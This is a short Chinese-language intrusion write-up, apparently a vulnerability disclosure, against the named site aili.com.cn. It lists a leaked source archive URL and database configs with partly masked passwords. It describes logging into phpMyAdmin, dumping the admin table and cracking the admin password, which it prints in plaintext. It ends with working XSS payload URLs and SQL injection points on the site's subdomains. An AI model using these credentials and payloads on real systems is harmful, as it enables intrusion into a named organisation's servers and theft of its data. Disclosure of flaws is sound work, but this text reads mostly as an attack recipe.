1 源代码泄露
http://www.aili.com.cn/aili.rar
全站源代码。
其中敏感配置文件:
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user'] = 'root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password'] = 'a*******7';
#2 Phpmyadmin配置文件泄露
在aili.rar\new\include下有配置文件config.php
$mydbhost = 'localhost';
$mydbuser ='root';
$mydbpwd = 'dk********(';
$mydbname = 'aili';
这里对应的是http://www.aili.com.cn/myadmin/index.php
登录之
SELECT * FROM `admin` LIMIT 0 , 30
找到了后台的账号密码md5,md5解密之,密码是ailiadmin
3 进入后台
后台地址http://aili.com.cn/new/admin/login.php
对不起TAT 是我太没用,后台拿不了webshell
#4 XSS两个
http://member.aili.com/?c=member&m=room&a=del&id=='><script>alert(/XSS/)</script>
http://tag.aili.com/tag/get_index_aili_guan/?id==%27%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
#5 sql注入
http://tag.aili.com/tag/get_index_aili_guan/?id=1%27
http://member.aili.com/?c=member&m=room&a=del&id=12